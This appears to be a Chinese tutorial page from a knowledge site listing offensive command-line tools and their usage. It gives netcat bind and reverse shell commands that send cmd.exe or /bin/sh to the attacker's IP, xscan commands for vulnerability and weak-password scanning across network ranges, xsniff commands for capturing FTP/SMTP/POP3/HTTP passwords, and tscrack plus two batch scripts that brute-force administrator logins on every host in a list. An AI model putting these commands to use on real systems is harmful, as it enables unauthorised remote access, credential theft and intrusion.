上一题下一题
跳转到
 
 
  世界如此多姿,发展如此迅速,窥一斑未必还能知全豹。但正如万花筒一样,每一个管窥都色彩斑斓。  
 
 
  知识通道 | 学习首页 | 教师首页 | PK首页 | 知识创造首页 | 企业首页 | 登录
 
本文对应知识领域
系统外部命令
作者:未知 申领版权
2010年12月12日 共有 2872 次访问 【添加到收藏夹】 【我要附加题目
受欢迎度:

    系统外部命令(均需下载相关工具):
    
    1、瑞士军刀:nc.exe
    
    参数说明: 
    -h 查看帮助信息 
    -d 后台模式 
    -e prog程序重定向,一但连接就执行[危险] 
    -i secs延时的间隔 
    -l 监听模式,用于入站连接 
    -L 监听模式,连接天闭后仍然继续监听,直到CTR C 
    -n IP地址,不能用域名 
    -o film记录16进制的传输 
    -p[空格]端口 本地端口号 
    -r 随机本地及远程端口 
    -t 使用Telnet交互方式 
    -u UDP模式 
    -v 详细输出,用-vv将更详细 
    -w数字 timeout延时间隔 
    -z 将输入,输出关掉(用于扫锚时) 
    基本用法: 
    nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 
    nc -l -p 80 开启本机的TCP 80端口并监听 
    nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 
    nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口 
    nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口 
    高级用法: 
    nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR C为止 
    nc -L -p 80 > c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR C,同时把结果输出到c:\log.txt 
    nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 
    type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 
    本机上用:nc -l -p 本机端口 
    在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
    nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙 
    本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称 
    在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机 
    备 注: 
    | 管道命令 
    < 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令 
    @ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt >> d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中 
    >与>>的区别   ">"指:覆盖;">>"指:保存到(添加到)。
    如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。
    
    (八)
    
    2、扫锚工具:xscan.exe
    
    基本格式 
    xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息 
    xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息 
    检测项目 
    -active 检测主机是否存活 
    -os 检测远程操作系统类型(通过NETBIOS和SNMP协议) 
    -port 检测常用服务的端口状态 
    -ftp 检测FTP弱口令 
    -pub 检测FTP服务匿名用户写权限 
    -pop3 检测POP3-Server弱口令 
    -smtp 检测SMTP-Server漏洞 
    -sql 检测SQL-Server弱口令 
    -smb 检测NT-Server弱口令 
    -iis 检测IIS编码/解码漏洞 
    -cgi 检测CGI漏洞 
    -nasl 加载Nessus攻击脚本 
    -all 检测以上所有项目 
    其它选项 
    -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取 
    -l 显示所有网络适配器 
    -v 显示详细扫描进度 
    -p 跳过没有响应的主机 
    -o 跳过没有检测到开放端口的主机 
    -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10 
    -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件) 
    
    用法示例 
    xscan -host 192.168.1.1-192.168.255.255 -all -active -p   检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机 
    xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机 
    xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
    
    (九)
    
    3、命令行方式嗅探器: xsniff.exe
    可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
    参数说明 
    -tcp 输出TCP数据报 
    -udp 输出UDP数据报 
    -icmp 输出ICMP数据报 
    -pass 过滤密码信息 
    -hide 后台运行 
    -host 解析主机名 
    -addr IP地址 过滤IP地址 
    -port 端口 过滤端口 
    -log 文件名 将输出保存到文件 
    -asc 以ASCII形式输出 
    -hex 以16进制形式输出 
    用法示例 
    xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 
    xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出 
    
    4、终端服务密码破解: tscrack.exe
    
    参数说明 
    -h 显示使用帮助 
    -v 显示版本信息 
    -s 在屏幕上打出解密能力 
    -b 密码错误时发出的声音 
    -t 同是发出多个连接(多线程) 
    -N Prevent System Log entries on targeted server 
    -U 卸载移除tscrack组件 
    -f 使用-f后面的密码 
    -F 间隔时间(频率) 
    -l 使用-l后面的用户名 
    -w 使用-w后面的密码字典 
    -p 使用-p后面的密码 
    -D 登录主页面 
    用法示例 
    tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码 
    tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户 
    @if not exist ipcscan.txt goto noscan 
    @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i 
    nscan 
    @echo 3389.txt no find or scan faild 
    (①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt) 
    3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat 
    @if not exist tscrack.exe goto noscan 
    @tscrack %1 -l administrator -w pass.dic >>rouji.txt 
    :noscan 
    @echo tscrack.exe no find or scan faild 
    (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了) 
    hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。 
    

    

 

相关新闻

testtest
上善制度的炼成
新时代呼唤管理理论创新——大卫�梯斯与动态能力理论
创业的不变逻辑
创新管理需要回答的5个问题
十一、弥离
十、转院
九、生机
八、传染
七、求血

您可能对这些感兴趣  

A0、A1、A2、A3图纸折叠方法
dos命令的其它用处
DOS命令全集:(网络收集3 )
DOS命令全集:(网络收集2 )
DOS命令全集:(网络收集 )
SQL优化34条
MS SQL Server查询优化方法
学习存储过程
事务全攻略
随机选择数据库记录的方法

题目筛选器
日期:
类型:
状态:
得分: <=
分类:
作者:
职业:
关键字:
搜索

 
 
 
  焦点事件
 
  知识体系
 
  职业列表
 
 
  最热文章
 
 
  最多引用文章
 
 
  最新文章
 
 
 
 
网站介绍 | 广告服务 | 招聘信息 | 保护隐私权 | 免责条款 | 法律顾问 | 意见反馈
版权所有 不得转载
沪ICP备 10203777 号 联系电话:021-54428255
  帮助提示    
《我的太学》是一种全新的应用,您在操作中遇到疑问或者问题,请拨打电话13564659895,15921448526。
《我的太学》